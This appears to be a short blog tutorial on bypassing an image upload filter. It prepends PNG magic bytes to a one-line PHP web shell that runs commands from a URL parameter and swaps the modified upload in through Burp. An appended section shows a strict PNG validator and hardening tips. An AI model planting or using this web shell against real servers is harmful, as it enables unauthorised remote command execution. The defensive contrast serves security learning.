Sleep
Jul 13, 2024

Filter Upload Bypassing Reverse Shell With A PNG

Scenario: you have a place to upload files that you can access, but a filter checks that the
file type matches the expected ones (e.g. only image file types).

PNG Image Header
89 50 4E 47

Open a hex editor and create a new file, then copy those bytes to the beginning of the new file. In the
TEXT area (on the right, not the bytes area where you just pasted the header above), paste your shell:

<?php system($_GET['c']);?>

It should look like this:

https://i.ibb.co/JFsThwN/Screenshot-2024-05-30-at-20-11-09-File-Upload-Filter-Bypass-pdf.png

Take note of the length

https://i.ibb.co/9vWymtc/Screenshot-2024-05-30-at-20-12-59-File-Upload-Filter-Bypass-pdf.png

Next, start Burp and navigate to the upload directory.

Then do the following:

1. Turn on the interceptor

2. Send an upload request with any file

3. Modify the request

Original

https://i.ibb.co/1fMyGpv/Screenshot-2024-05-30-at-20-14-44-File-Upload-Filter-Bypass-pdf.png

Modified

https://i.ibb.co/bbXq6QH/Screenshot-2024-05-30-at-20-15-43-File-Upload-Filter-Bypass-pdf.png

Then forward the request and disable the interceptor.
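
On the server side, the filter described above fails because it looks only at the leading bytes. The following is an added example, not code from the original post: it contrasts that weak check with one that parses the whole file as a PNG. The function names, the constructed 1x1 sample image and the placeholder payload body are assumptions made for illustration.

```python
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"  # full 8-byte signature; the post shows its first 4 bytes

def weak_magic_check(data: bytes) -> bool:
    """The kind of filter the post defeats: inspects only the leading bytes."""
    return data.startswith(b"\x89PNG")

def strict_png_check(data: bytes) -> bool:
    """Accept only a structurally complete PNG: full signature, CRC-valid chunks,
    IHDR first, at least one IDAT, IEND last, and no bytes after IEND."""
    if not data.startswith(PNG_SIGNATURE):
        return False
    pos, seen = len(PNG_SIGNATURE), []
    while pos < len(data):
        if pos + 8 > len(data):
            return False  # truncated chunk header
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        end = pos + 8 + length + 4
        if end > len(data):
            return False  # declared length runs past end of file
        body = data[pos + 8:pos + 8 + length]
        (crc,) = struct.unpack(">I", data[end - 4:end])
        if zlib.crc32(ctype + body) != crc:
            return False
        seen.append(ctype)
        pos = end
        if ctype == b"IEND":
            break
    return (len(seen) >= 3 and seen[0] == b"IHDR" and b"IDAT" in seen
            and seen[-1] == b"IEND" and pos == len(data))

def chunk(ctype: bytes, body: bytes) -> bytes:
    # Helper for building the sample: length + type + data + CRC32(type + data)
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", zlib.crc32(ctype + body))

def make_sample_png() -> bytes:
    """Constructed 1x1 grayscale PNG used as known-good input."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)
    idat = zlib.compress(b"\x00\x00")  # filter byte + one pixel
    return PNG_SIGNATURE + chunk(b"IHDR", ihdr) + chunk(b"IDAT", idat) + chunk(b"IEND", b"")

# Constructed stand-in for the file the post builds: 4 header bytes followed by non-image text.
SPOOFED = bytes.fromhex("89504e47") + b"<?php /* placeholder body */ ?>"
```

Content checks are one layer only: the stored file should also get a server-generated name and extension and be kept where the web server will not execute it.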
